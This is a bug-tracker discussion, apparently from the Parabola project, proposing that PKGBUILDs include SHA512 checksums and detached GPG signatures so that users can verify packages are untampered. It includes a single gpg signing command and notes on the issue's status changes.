Project

General

Profile

Bug #747

[RFC] PKGBUILDs should include SHA512 checksum + GPG signature

g4jc - over 5 years ago - . Updated over 3 years ago.

Status:
open
Priority:
discussion
Assignee:
-
% Done:

0%


Description

Gentoo is now using SHA512 + Whirpool and GPG signed source packages. I got the idea that this great security practice could be implemented in our PKGBUILD's as well and went to work to see if it was possible. Using just a few lines of bash, it is definitely possible.

Attached you will find a proof of concept PKGBUILD I made for a file integrity checking security software that is GPL.

This could be good practice for users of AUR/ABS, etc. where PKGBUILDs can be verified safe and untampered.


Files

PKGBUILD.zip (2.1 KB) PKGBUILD.zip g4jc, 2015-06-23 03:09 AM
PKGBUILD.zip (1.9 KB) PKGBUILD.zip g4jc, 2015-06-26 03:01 AM

History

#1

Updated by g4jc over 5 years ago

Per Emulatorman we should use .sig instead of armoured .asc to keep it uniform with currently signed packages.
I can confirm this also works as simply as...
gpg --default-key [KEYID] -b PKGBUILD

Attached is another example GPG-signed PKGBUILD of a recently requested package.

#2

Updated by Anonymous about 5 years ago

g4jc wrote:

Per Emulatorman we should use .sig instead of armoured .asc to keep it uniform with currently signed packages.
I can confirm this also works as simply as...
gpg --default-key [KEYID] -b PKGBUILD

Attached is another example GPG-signed PKGBUILD of a recently requested package.

I suggest you open a consensus about it to devs list as official packaging policy for Parabola.

#3

Updated by lukeshu over 4 years ago

  • Priority changed from feature to discussion
  • Subject changed from PKGBUILDs should include SHA512 checksum + GPG signature to [RFC] PKGBUILDs should include SHA512 checksum + GPG signature
#4

Updated by lukeshu over 3 years ago

  • Project changed from libretools to Packages

Also available in: Atom PDF